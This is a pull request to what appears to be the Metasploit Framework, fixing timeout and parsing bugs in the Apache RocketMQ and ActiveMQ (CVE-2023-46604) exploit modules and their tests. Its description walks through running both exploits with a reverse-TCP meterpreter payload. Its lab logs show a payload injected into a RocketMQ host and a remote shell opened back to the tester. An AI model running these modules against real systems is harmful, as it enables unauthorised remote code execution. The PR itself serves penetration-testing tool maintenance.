### PR TITLE
Apache RocketMQ & ActiveMQ fixes

### DIFF
--- a/lib/msf/core/auxiliary/rocketmq.rb
+++ b/lib/msf/core/auxiliary/rocketmq.rb
@@ -25,10 +25,12 @@ module Msf
       begin
         connect
         sock.send(header + data_length + data, 0)
-        res = sock.recv(1024)
+        res_length = sock.timed_read(4).unpack1('N')
+        res = sock.timed_read(res_length)
       rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
         print_error("Unable to connect: #{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-        elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+        elog('Error sending the rocketmq version request', error: e)
+        return nil
       ensure
         disconnect
       end
@@ -64,7 +66,11 @@ module Msf
     # @return [Hash] Hash including RocketMQ versions info and Broker info if found
     def parse_rocketmq_data(res)
       # remove a response header so we have json-ish data
-      res = res[8..]
+      res = res.split(/\x00_/)[1]
+      unless res.starts_with?("{")
+        print_error("Failed to successfully remove the response header and now cannot parse the response.")
+        return nil
+      end
 
       # we have 2 json objects appended to each other, so we now need to split that out and make it usable
       res = res.split('}{')
@@ -111,13 +117,20 @@ module Msf
       # Example of brokerData:
       # [{"brokerAddrs"=>{"0"=>"172.16.199.135:10911"}, "brokerName"=>"DESKTOP-8ATHH6O", "cluster"=>"DefaultCluster"}]
 
+      if broker_datas['brokerDatas'].blank?
+        print_status("brokerDatas field is missing from the response, assuming default broker port of #{default_broker_port}")
+        return default_broker_port
+      end
       broker_datas['brokerDatas'].each do |broker_data|
+        if broker_data['brokerAddrs'].blank?
+          print_status("brokerAddrs field is missing from the response, assuming default broker port of #{default_broker_port}")
+          return default_broker_port
+        end
         broker_data['brokerAddrs'].values.each do |broker_endpoint|
           next unless broker_endpoint.start_with?("#{rhost}:")
           return broker_endpoint.match(/\A#{rhost}:(\d+)\z/)[1].to_i
         end
       end
-
 
       print_status("autodetection failed, assuming default port of #{default_broker_port}")
       default_broker_port

--- a/lib/msf/core/auxiliary/rocketmq.rb
+++ b/lib/msf/core/auxiliary/rocketmq.rb
@@ -25,7 +25,9 @@ module Msf
       begin
         connect
         sock.send(header + data_length + data, 0)
-        res_length = sock.timed_read(4).unpack1('N')
+        res_length = sock.timed_read(4)&.unpack1('N')
+        return nil if res_length.nil?
+
         res = sock.timed_read(res_length)
       rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
         print_error("Unable to connect: #{e.class} #{e.message}\n#{e.backtrace * "\n"}")

--- a/modules/exploits/multi/http/apache_rocketmq_update_config.rb
+++ b/modules/exploits/multi/http/apache_rocketmq_update_config.rb
@@ -72,6 +72,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     @version_request_response = send_version_request
+    return Exploit::CheckCode::Unknown('Unable to determine the version') unless @version_request_response
+
     @parsed_data = parse_rocketmq_data(@version_request_response)
     return Exploit::CheckCode::Unknown('RocketMQ did not respond to the request for version information') unless @parsed_data['version']
 

--- a/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
+++ b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
@@ -80,15 +80,19 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     connect
 
-    res = sock.get_once
+    len = sock.timed_read(4).unpack1('N')
+
+    return CheckCode::Unknown if len > 0x2000 # upper limit in case the service isn't ActiveMQ
+
+    res = sock.timed_read(len)
 
     disconnect
 
     return CheckCode::Unknown unless res
 
-    len, _, magic = res.unpack('NCZ*')
+    _, magic = res.unpack('CZ*')
 
-    return CheckCode::Unknown unless res.length == len + 4
+    return CheckCode::Unknown unless res.length == len
 
     return CheckCode::Unknown unless magic == 'ActiveMQ'
 
@@ -110,6 +114,8 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")
+  rescue ::Timeout::Error
+    CheckCode::Unknown
   end
 
   def exploit

--- a/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
+++ b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
@@ -80,9 +80,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     connect
 
-    len = sock.timed_read(4).unpack1('N')
+    len = sock.timed_read(4)&.unpack1('N')
 
-    return CheckCode::Unknown if len > 0x2000 # upper limit in case the service isn't ActiveMQ
+    return CheckCode::Unknown if len.nil? || len > 0x2000 # upper limit in case the service isn't ActiveMQ
 
     res = sock.timed_read(len)
 

--- a/spec/lib/msf/core/auxiliary/rocketmq_spec.rb
+++ b/spec/lib/msf/core/auxiliary/rocketmq_spec.rb
@@ -9,7 +9,7 @@ RSpec.describe Msf::Auxiliary::Rocketmq do
   end
 
   let(:mock_name_server_response) do
-    "\x00\x00\x00_{\"code\":105,\"extFields\":{\"Signature\":\"/u5P/wZUbhjanu4LM/UzEdo2u2I=\",\"topic\":\"TBW102\",\"AccessKey\":\"rocketmq2\"},\"flag\":0,\"language\":\"JAVA\",\"opaque\":1,\"serializeTypeCurrentRPC\":\"JSON\",\"version\":401}".b
+    "\x00\x00\x00\xC7\x00\x00\x00\xC3{\"code\":105,\"extFields\":{\"Signature\":\"/u5P/wZUbhjanu4LM/UzEdo2u2I=\",\"topic\":\"TBW102\",\"AccessKey\":\"rocketmq2\"},\"flag\":0,\"language\":\"JAVA\",\"opaque\":1,\"serializeTypeCurrentRPC\":\"JSON\",\"version\":401}".b
   end
 
   let(:expected_name_server_response) do
@@ -55,6 +55,9 @@ RSpec.describe Msf::Auxiliary::Rocketmq do
   describe '#send_version_request' do
     it 'returns version info' do
       expect(mock_sock).to receive(:send).with(mock_name_server_response, 0)
+      expect(mock_sock).to receive(:timed_read).with(4).and_return([expected_name_server_response.length].pack('N'))
+      expect(mock_sock).to receive(:timed_read).with(expected_name_server_response.length).and_return(expected_name_server_response)
+
       expect(subject.send_version_request).to eq(expected_name_server_response)
     end
   end

--- a/spec/lib/msf/core/auxiliary/rocketmq_spec.rb
+++ b/spec/lib/msf/core/auxiliary/rocketmq_spec.rb
@@ -9,11 +9,11 @@ RSpec.describe Msf::Auxiliary::Rocketmq do
   end
 
   let(:mock_name_server_response) do
-    "\x00\x00\x00\xC7\x00\x00\x00\xC3{\"code\":105,\"extFields\":{\"Signature\":\"/u5P/wZUbhjanu4LM/UzEdo2u2I=\",\"topic\":\"TBW102\",\"AccessKey\":\"rocketmq2\"},\"flag\":0,\"language\":\"JAVA\",\"opaque\":1,\"serializeTypeCurrentRPC\":\"JSON\",\"version\":401}".b
+    "\x00\x00\x00_{\"code\":105,\"extFields\":{\"Signature\":\"/u5P/wZUbhjanu4LM/UzEdo2u2I=\",\"topic\":\"TBW102\",\"AccessKey\":\"rocketmq2\"},\"flag\":0,\"language\":\"JAVA\",\"opaque\":1,\"serializeTypeCurrentRPC\":\"JSON\",\"version\":401}".b
   end
 
   let(:expected_name_server_response) do
-    "\x00\x00\x01a\x00\x00\x00_{\"code\":0,\"flag\":1,\"language\":\"JAVA\",\"opaque\":1,\"serializeTypeCurrentRPC\":\"JSON\",\"version\":403}{\"brokerDatas\":[{\"brokerAddrs\":{\"0\":\"172.16.199.135:10911\"},\"brokerName\":\"DESKTOP-8ATHH6O\",\"cluster\":\"DefaultCluster\"}],\"filterServerTable\":{},\"queueDatas\":[{\"brokerName\":\"DESKTOP-8ATHH6O\",\"perm\":7,\"readQueueNums\":8,\"topicSysFlag\":0,\"writeQueueNums\":8}]}".b
+    "\x00\x00\x00_{\"code\":0,\"flag\":1,\"language\":\"JAVA\",\"opaque\":1,\"serializeTypeCurrentRPC\":\"JSON\",\"version\":403}{\"brokerDatas\":[{\"brokerAddrs\":{\"0\":\"172.16.199.135:10911\"},\"brokerName\":\"DESKTOP-8ATHH6O\",\"cluster\":\"DefaultCluster\"}],\"filterServerTable\":{},\"queueDatas\":[{\"brokerName\":\"DESKTOP-8ATHH6O\",\"perm\":7,\"readQueueNums\":8,\"topicSysFlag\":0,\"writeQueueNums\":8}]}".b
   end
 
   let(:expected_parsed_data_response) do


### PR DESCRIPTION
Fixes a timeout issue that was being seen when running the following modules:
- modules/exploits/multi/http/apache_rocketmq_update_config.rb
- modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb

Once this PR is landed we should be able to close https://github.com/rapid7/metasploit-framework/pull/19037 & https://github.com/rapid7/metasploit-framework/pull/19038
## Verification

### RocketMQ
1. Start msfconsole.
1. Do: ` use exploit/multi/http/apache_rocketmq_update_config`.
1. Set the `RHOST` and `LHOST` options.
1. Run the module.
1. Receive a session in the context of the user running the RocketMQ application.

### ActiveMQ
Steps (Linux target):
1. Start msfconsole
2. `use exploit/multi/misc/apache_activemq_rce_cve_2023_46604`
3. `set RHOST <LINUX_TARGET_IP>`
4. `set SRVHOST eth0`
5. `set target 1`
6. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
7. `check`
8. `exploit`

Ensure neither module hangs, times out or errors in any unexpected way (they shouldn't).

## Testing
### RocketMQ
```
msf6 exploit(multi/http/apache_rocketmq_update_config) > options

Module options (exploit/multi/http/apache_rocketmq_update_config):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   BROKER_PORT  10911            no        The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommen
                                           ded)
   CHOST                         no        The local client address
   CPORT                         no        The local client port
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        9876             yes       The RocketMQ NameServer port (TCP)
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ezCLiIlwE        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT               4434             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/apache_rocketmq_update_config) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.199.1:4434
[*] 127.0.0.1:9876 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:9876 - The target appears to be vulnerable. RocketMQ version: 4.9.4
[*] 127.0.0.1:9876 - autodetection failed, assuming default port of 10911
[*] 127.0.0.1:9876 - Executing target: Automatic (Unix In-Memory) with payload cmd/linux/http/x64/meterpreter/reverse_tcp on Broker port: 10911
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] 127.0.0.1:9876 - Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted
[+] 127.0.0.1:9876 - Determined the original $ROCKETMQ_HOME: /home/rocketmq/rocketmq-4.9.4
[*] 127.0.0.1:9876 - Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value
[*] Meterpreter session 11 opened (172.16.199.1:4434 -> 172.16.199.1:59206) at 2024-04-26 14:09:31 -0700

meterpreter > getuid
Server username: rocketmq
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : CentOS 7.9.2009 (Linux 6.6.22-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down session: 11

[*] 127.0.0.1 - Meterpreter session 11 closed.  Reason: User exit
```
### ActiveMQ
```
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > options

Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    61616            yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Unix



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 127.0.0.1:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.6
```